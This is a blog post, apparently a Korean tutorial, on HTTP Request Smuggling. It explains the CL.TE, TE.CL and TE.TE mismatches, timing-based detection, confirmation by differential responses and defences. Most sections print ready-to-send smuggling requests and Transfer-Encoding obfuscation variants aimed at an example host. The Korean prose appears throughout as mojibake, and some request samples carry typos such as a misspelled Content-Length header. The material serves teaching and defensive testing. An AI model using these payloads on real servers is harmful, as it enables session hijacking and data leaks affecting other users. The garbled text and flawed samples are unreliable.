web hacking πŸ–₯/techniques ❌ principles

HTTP Request Smuggling 취약점

Kortsec1 2024. 12. 8. 20:36

01. HTTP Request Smuggling 취약점?

HTTP Request Smuggling(HRS) 취약점은 2005λ…„ λ°œκ²¬λ˜μ—ˆλ‹€. Front-end μ„œλ²„μ™€ Back-end μ„œλ²„ κ°„μ˜ 뢈일치λ₯Ό μ΄μš©ν•΄ 좔가적인 Requestλ₯Ό μ‚½μž…ν•  수 μžˆλ‹€.

[IMG1] HTTP Request Smuggling

  • Front-end : Content-Length 헀더λ₯Ό μš°μ„ μ‹œ
  • Back-end : Transfer-Encoding 헀더λ₯Ό μš°μ„ μ‹œ

μœ„μ™€κ°™μ€ μ˜ˆμ‹œ ν™˜κ²½μ—μ„œ 야기될 수 μžˆλŠ” λ³΄μ•ˆλ¬Έμ œλŠ” κΆŒν•œ μƒμŠΉ(Privilege Escalation), μ„Έμ…˜ ν•˜μ΄μž¬ν‚Ή(Session Hijacking), λ―Όκ°ν•œ 정보 λ…ΈμΆœ(Critical Info Leak) 등이 μžˆλ‹€.

02. HRS의 λ°°κ²½, HTTP Request 헀더

HTTP/1 μš”μ²­μ˜ 끝을 νŒλ‹¨ν•˜λŠ” λ°©μ‹μ—λŠ” Content-Length 헀더와 Transfer-Encoding 헀더λ₯Ό μ΄μš©ν•œ 두 κ°€μ§€ 방식이 μ‘΄μž¬ν•œλ‹€. 그리고 λŒ€λΆ€λΆ„μ˜ HRS 취약점 λ°œμƒμ˜ 원인은 μ—¬κΈ°μ„œ λΉ„λ‘―λœλ‹€.

1) Content-Length

Content-Length ν—€λ”λŠ” HTTP Request의 Body 길이λ₯Ό λ°”μ΄νŠΈ λ‹¨μœ„λ‘œ λͺ…μ‹œν•œλ‹€. 이λ₯Ό 톡해 μš”μ²­μ˜ 끝을 λͺ…ν™•ν•˜κ²Œ μ •μ˜ν•  수 μžˆλ‹€.

POST /search HTTP/1.1
HOST: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

x=smuggling

2) Transfer-Encoding

Transfer-Encoding ν—€λ”λŠ” μš”μ²­ 본문이 ν•˜λ‚˜ μ΄μƒμ˜ 청크 μΈμ½”λ”©λœ λ©”μ„Έμ§€λ₯Ό ν¬ν•¨ν• λ•Œ μ‚¬μš©λœλ‹€. 각 μ²­ν¬λŠ” 청크 λ©”μ‹œμ§€μ˜ 길이(16μ§„μˆ˜ ν˜•μ‹), λ©”μ‹œμ§€ 본문을 ν¬ν•¨ν•˜κ³  0을 끝으둜 μ’…λ£Œλ¨μ„ μ•Œλ¦°λ‹€.

POST /search HTTP/1.1
HOST: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

b
x=smuggling
0

μœ„ 헀더듀을 λ™μ‹œμ— μ‚¬μš©ν•  경우 λ¬Έμ œκ°€ λ°œμƒν•  수 μžˆλ‹€. λ¬Όλ‘  이λ₯Ό 막기 μœ„ν•΄ ν•˜λ‚˜μ˜ μ„œλ²„μΈ μƒνƒœμ˜ 경우 Content-Length 헀더가 λ¬΄μ‹œλ˜λŠ” μ‹μ˜ λ³΄ν˜Έμ±…μ΄ λ°œλ™λœλ‹€. ν•˜μ§€λ§Œ λ‘κ°œ μ΄μƒμ˜ μ—°κ²°λœ μ„œλ²„λ₯Ό μš΄μš©ν•  경우 특히 Transfer-Encoding 헀더λ₯Ό μ§€μ›ν•˜λŠ” μ„œλ²„μ™€ μ§€μ›ν•˜μ§€ μ•ŠλŠ” μ„œλ²„κ°€ μ—°κ²°λ˜μ–΄ μžˆλŠ” 경우 λ¬Έμ œκ°€ λ°œμƒν•˜κ²Œ λœλ‹€.

HTTP/2 end-to-end 을 μ‚¬μš©ν•˜λŠ” μ›Ή μ‚¬μ΄νŠΈλ“€μ€ HRS 곡격에 면역이 μžˆλ‹€. κ³΅κ²©μžκ°€ λΆˆν™•μ‹€ν•œ μ •λ³΄μ˜ 길이λ₯Ό 보내도 HTTP/2의 κ°•λ ₯ν•œ 단일 λ©”μ»€λ‹ˆμ¦˜μ΄ 이λ₯Ό μ •ν™•ν•˜κ²Œ μ²˜λ¦¬ν•˜κΈ° λ•Œλ¬Έμ΄λ‹€. ν•˜μ§€λ§Œ μˆ˜λ§Žμ€ μ›Ήμ‚¬μ΄νŠΈλ“€μ€ HTTP/2 front-end μ„œλ²„λ₯Ό λ‘λŠ” λ™μ‹œμ— HTTP/1λ§Œμ„ μ§€μ›ν•˜λŠ” back-end μ„œλ²„λ₯Ό 기반으둜 λ§Œλ“€μ–΄μ§„λ‹€. μ΄λŠ” HTTP downgrading을 μ΄μš©ν•΄ ν•΄κ²° κ°€λŠ₯ν•˜λ‹€.

03. HRS μ·¨μ•½ μœ ν˜•

기본적인 HRS 곡격은 Content-Length헀더와 Transfer-Encoding헀더λ₯Ό λͺ¨λ‘ ν¬ν•¨μ‹œν‚¨λ‹€. μ›ν™œν•œ μ„€λͺ…을 μœ„ν•΄ μ§€κΈˆλΆ€ν„° Content-Length와 Transfer-Encoding을 각각 CLκ³Ό TE라고 μ§€μΉ­ν•˜κ² λ‹€. front-end μ„œλ²„μ™€ back-end μ„œλ²„μ˜ νŠΉμ§•μ— 따라 λ‹€μ–‘ν•œ μ·¨μ•½ μœ ν˜•μ΄ μ‘΄μž¬ν•œλ‹€.

  • CL.TE : front-end μ„œλ²„κ°€ CL 헀더λ₯Ό μ΄μš©ν•˜κ³ , back-end μ„œλ²„κ°€ TE 헀더λ₯Ό μ΄μš©ν•  λ•Œ
  • TE.CL : front-end μ„œλ²„κ°€ TE 헀더λ₯Ό μ΄μš©ν•˜κ³ , back-end μ„œλ²„κ°€ CL 헀더λ₯Ό μ΄μš©ν•  λ•Œ
  • TE.TE : 두 μ„œλ²„ λͺ¨λ‘ TE 헀더λ₯Ό μ§€μ›ν•˜μ§€λ§Œ, 헀더λ₯Ό νŠΉμ •ν•œ λ°©μ‹μœΌλ‘œ μ‘°μž‘ν•˜μ—¬ ν•œ μ„œλ²„κ°€ μ •μƒμ μœΌλ‘œ μ²˜λ¦¬ν•˜μ§€ λͺ»ν•˜κ²Œ ν•  수 μžˆμ„ λ•Œ

CL.TE

POST / HTTP/1.1
Host: kortsec1.com
Conent-Length: 10
Transfer-Encoding: chunked

0

KANYE

front-end μ„œλ²„λŠ” CL을, back-end μ„œλ²„λŠ” TEλ₯Ό μ‚¬μš©ν•˜λŠ” ν™˜κ²½μ—μ„œμ˜ 곡격이닀. front-end μ—μ„œλŠ” CL을 톡해 “KANYE”κΉŒμ§€μ˜ 정보λ₯Ό λ°›μ•„μ˜¨λ‹€. ν•˜μ§€λ§Œ back-endμ—μ„œλŠ” TE 헀더λ₯Ό 톡해 0 을 λ§Œλ‚˜λ©° μš”μ²­μ˜ 끝이라 νŒλ‹¨ν•˜λ©° “KANYE”λŠ” λ‚¨κ²Œ λœλ‹€. μ΄λ ‡κ²Œ 남은 λ°μ΄ν„°λŠ” κ·Έ λ‹€μŒ μš”μ²­μ΄ μžˆλŠ” μˆœκ°„μ— 읽히게 λœλ‹€.

TE.CL

POST / HTTP/1.1
Host: kortsec1.com
Content-Length: 3
Transfer-Encoding: chunked

5
KANYE
0

front-end μ„œλ²„λŠ” TEλ₯Ό, back-end μ„œλ²„λŠ” CL을 μ‚¬μš©ν•˜λŠ” ν™˜κ²½μ—μ„œμ˜ 곡격이닀. front-endλŠ” TE에 따라 ν•΄λ‹Ή μš”μ²­μ˜ 데이터λ₯Ό λͺ¨λ‘ 받아듀인닀. 5λŠ” λ³Έλ¬Έ “KANYE”의 길이λ₯Ό, λ§ˆμ§€λ§‰ 0은 μš”μ²­μ˜ μ’…λ£Œλ₯Ό λœ»ν•œλ‹€. 그리고 λ§ˆμ§€λ§‰ 0의 λ’€μ—λŠ” “\r\n\r\n”이 μ΄μ–΄μ„œ λ‚˜μ™€μ•Ό ν•œλ‹€. μ΄λ ‡κ²Œ 전달받은 μš”μ²­μ€ back-end μ„œλ²„μ—μ„œ λ³€ν™”κ°€ μƒκΈ°λŠ”λ°, CL을 μ‚¬μš©ν•˜λŠ” back-end ν™˜κ²½μ—μ„œλŠ” 3μ΄λΌλŠ” 값을 ν† λŒ€λ‘œ “5\r\n” λ§Œμ„ 받아듀인닀. “KANYE”λ“±μ˜ λ‚˜λ¨Έμ§€ λ°μ΄ν„°λŠ” back-end μ„œλ²„μ— λ‚¨κ²Œ 되고, μ΄λŠ” λ‹€μŒλ²ˆ μš”μ²­μ˜ μ‹œμž‘μœΌλ‘œ λ°›μ•„λ“€μ΄κ²Œ λœλ‹€.

TE.TE

front-end μ„œλ²„μ™€ back-end μ„œλ²„ λͺ¨λ‘ TE 헀더λ₯Ό μ§€μ›ν•˜μ§€λ§Œ, 헀더λ₯Ό μ‘°μž‘ν•˜μ—¬ 이 쀑 ν•œ μ„œλ²„κ°€ 이λ₯Ό μ •μƒμ μœΌλ‘œ μˆ˜ν–‰ν•˜μ§€ λͺ»ν•˜κ²Œ ν•˜λŠ” 곡격 방법이닀. μ΄λŠ” λ‹€μ–‘ν•œ ν™˜κ²½μ΄ κ°€μ§€κ³ μžˆλŠ” νŠΉμ„±μ„ μ•Œκ³  κ΅¬λΆ„ν•˜μ—¬ μ§„ν–‰ν•˜κΈ°μ— ν•„μˆ˜μ μœΌλ‘œ ν™˜κ²½μ— λŒ€ν•œ 이해가 ν•„μš”ν•˜λ‹€.

Transfer-Encoding: xchunked
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
A: A[\n]Transfer-Encoding: chunked
Transfer-Encoding : chunked

04. HRS 취약점 탐지

Timing Techniques

HRS 취약점을 νƒμ§€ν•˜λŠ” κ°€μž₯ 효과적인 λ°©λ²•μœΌλ‘œ Timing 기법을 λ“€ 수 μžˆλ‹€. μ·¨μ•½ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ— νŠΉμ • μš”μ²­μ„ 보내 μ§€μ—°μ‹œκ°„μ„ λ°œμƒμ‹œν‚€λŠ” 방식이닀.

  • CL.TE 취약점 탐지
POST / HTTP/1.1
Host: kortsec1.com
Transfer-Encoding: chunked
Content-Length: 4

1
A
X

CL.TE 취약점이 μ‘΄μž¬ν•˜λŠ” ν™˜κ²½μ—μ„œ νƒμ§€ν•˜λŠ” 상황이닀. front-end μ„œλ²„λŠ” CL 헀더λ₯Ό 톡해 “X”λ₯Ό μ œμ™Έν•œ μ •λ³΄λ§Œμ„ λ°›κ³ , back-end μ„œλ²„λŠ” TE 헀더λ₯Ό 톡해 λ‹€μŒ chunkλ₯Ό κΈ°λ‹€λ¦°λ‹€. 이 λ•Œ μ§€μ—°μ‹œκ°„μ΄ λ°œμƒν•˜κ²Œ λ˜λŠ” 것이닀.

  • TE.CL 취약점 탐지
POST / HTTP/1.1
Host: kortsec1.com
Transfer-Encoding: chunked
Content-Length: 6

0

X

TE.CL 취약점이 μ‘΄μž¬ν•˜λŠ” ν™˜κ²½μ—μ„œμ˜ 탐지 상황이닀. front-endλŠ” TE 헀더λ₯Ό 톡해 0κΉŒμ§€μ˜ μ •λ³΄λ§Œμ„ λ„˜κΈ΄λ‹€. ν•œνŽΈ back-end μ—μ„œλŠ” CL ν—€λ”μ˜ 값에 따라 6길이의 데이터λ₯Ό κΈ°λ‹€λ¦¬κ²Œ λœλ‹€. μ΄λ ‡κ²Œ μ§€μ—°μ‹œκ°„μ΄ λ°œμƒν•œλ‹€. μœ„ 방법은 λ‹€λ₯Έ μ‚¬μš©μžμ—κ²Œ 영ν–₯이 μžˆμ„ 수 μžˆλ‹€. μΉ¨ν•΄λ₯Ό μ΅œμ†Œν™” ν•˜κ±°λ‚˜ μ€λ°€νžˆ νƒμ§€ν•˜κΈ° μœ„ν•΄μ„  CL.TEλ₯Ό μš°μ„ μ μœΌλ‘œ μ‹œν–‰ν•œ 후에 ν…ŒμŠ€νŠΈν•˜λŠ” 것이 μ’‹λ‹€.

05. HRS 취약점 Confirming

Differential Responses

μ·¨μ•½μ μ˜ 쑴재λ₯Ό ν™•μΈν•˜μ˜€μ„ λ•Œ 이λ₯Ό ν™•μ‹€μ‹œ ν•˜κ³ , 좔가적인 정보λ₯Ό μ–»κΈ° μœ„ν•΄ 두 κ°€μ§€μ˜ μš”μ²­μ„ λ³΄λ‚΄λŠ” 방법이닀. μš°μ„  λ‹€μŒ μš”μ²­μ— 영ν–₯을 μ£ΌκΈ° μœ„ν•΄ μ§œμ—¬μ§„ κ³΅κ²©μš”μ²­μ„ 보낸닀. κ·Έ λ‹€μŒ 정상적인 μš”μ²­μ„ 보내, μ˜ˆμƒν•œ λ°˜μ‘μ„ λ³΄μ΄λŠ”μ§€ ν™•μΈν•œλ‹€.

POST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=kanyewest

μœ„ μš”μ²­μ€ λ‘λ²ˆμ§Έλ‘œ 보낼 정상적인 μš”μ²­μ΄λ‹€. κ°œλ³„μ μœΌλ‘œ 보낸닀면 정상적인 λ°˜μ‘μ„ λ³΄μ΄κ² μ§€λ§Œ, κ³΅κ²©μš”μ²­ 이후에 보낸닀면 λ‹€λ₯Έ λ°˜μ‘μ΄ λ‚˜νƒ€λ‚  것이닀. 그리고 이에 λ•ŒλΌ CL.TE λ‚˜ TE.CL 이 κ²°μ •λœλ‹€.

  • CL.TE
POST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=kanyewest&x=
0

GET /404 HTTP/1.1
Foo: x

CL.TE 취약점이 μžˆλŠ” μƒν™©μ˜ 탐지법이닀. μœ„ 곡격 μš”μ²­μ΄ 성곡적이라면, λ§ˆμ§€λ§‰ 두 쀄은 back-end μ„œλ²„μ—μ„œ λ‹€μŒ μš”μ²­μ˜ μΌλΆ€λ‘œ 취급될 것이닀. κ·Έλ¦¬ν•˜μ—¬ λ‹€μŒ 정상적인 μš”μ²­μ„ 보내면 μ•„λž˜μ™€ 같은 κ²°κ³Όκ°€ λ‚˜μ˜¨λ‹€.

GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=kanyewest
  • TE.CL
POST /search HTTP/1.1
Host: korsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

71
GET /404 HTTP/1.1
Host: kortsec1.com
Content-type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

TE.CL 취약점이 μžˆλŠ” 상황이닀. μœ„ 곡격 μš”μ²­μ„ 보내고 λ‚˜λ©΄, front-end μ„œλ²„λŠ” λͺ¨λ“  정보λ₯Ό 보내고 back-end μ„œλ²„λŠ” CL 헀더에 따라 “GET” μ΄ν›„μ˜ μ •λ³΄λŠ” λ‹€μŒ μš”μ²­μœΌλ‘œμ¨ λ°›κ²Œ λœλ‹€. κ·Έλ ‡κ²Œ 정상 μš”μ²­μ„ 보내면 μ•„λž˜μ™€ 같이 λ³΄λ‚΄λŠ” 꼴이 λ˜λŠ” 것이닀.

GET /404 HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

x=
0

POST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=kanyewest

06. λ³΄μ•ˆ

μ΄λŸ¬ν•œ HRS 취약점을 μ˜ˆλ°©ν•˜κΈ° μœ„ν•΄μ„  μ—¬λŸ¬κ°€μ§€ 방법이 μ‘΄μž¬ν•œλ‹€.

  • HTTP/2 end to end λ₯Ό μ‚¬μš©ν•˜κ³ , HTTP downgrading을 λΉ„ν™œμ„±ν™”ν•˜λŠ” 방법

HTTP/2λŠ” μš”μ²­μ˜ 길이 νŒλ‹¨μ— μžˆμ–΄ κ°•λ ₯ν•œ λ©”μ»€λ‹ˆμ¦˜μ„ μ‚¬μš©ν•˜κΈ° λ•Œλ¬Έμ— end to end μ‚¬μš©μ‹œ 본질적으둜 HRS 예방이 κ°€λŠ₯ν•˜λ‹€. ν•˜μ§€λ§Œ λΆˆκ°€ν”Όν•˜κ²Œ HTTP downgrading 을 ν”Όν•  수 μ—†λ‹€λ©΄, μˆ˜μ •λœ μš”μ²­μ„ HTTP/1.1μ—μ„œ ν™•μ‹€ν•˜κ²Œ 검증할 수 있게 ν•΄μ•Όν•œλ‹€.

  • λΆ„λͺ…μΉ˜ μ•Šμ€ μš”μ²­μ— λŒ€ν•œ 처리

front-end μ„œλ²„μ—μ„œλŠ” λΆˆν™•μ‹€ν•œ μš”μ²­μ— λŒ€ν•΄ 정상화 μ‹œν‚€κ³  λ³΄λ‚΄κ²Œ ν•œλ‹€. back-end μ„œλ²„μ—μ„œλ„ μ—¬μ „νžˆ λΆˆν™•μ‹€ν•œ μš”μ²­μ— λŒ€ν•΄μ„œλŠ” 막고 TCP 연결을 λ‹«μ•„μ•Ό ν•œλ‹€.

  • μ—λŸ¬μ— λŒ€ν•œ ν™•μ‹€ν•œ 처리

μ„œλ²„ μΈ‘ exception이 λ°œμƒν•œλ‹€λ©΄ 연결을 λ‹«μ•„μ•Ό ν•˜κ³ , μ΄λŠ” κΈ°λ³Έμ μ΄μ§€λ§Œ λ°©μ‹¬ν•˜κΈ° μ‰¬μš΄ μ€‘μš”ν•œ 사항이닀.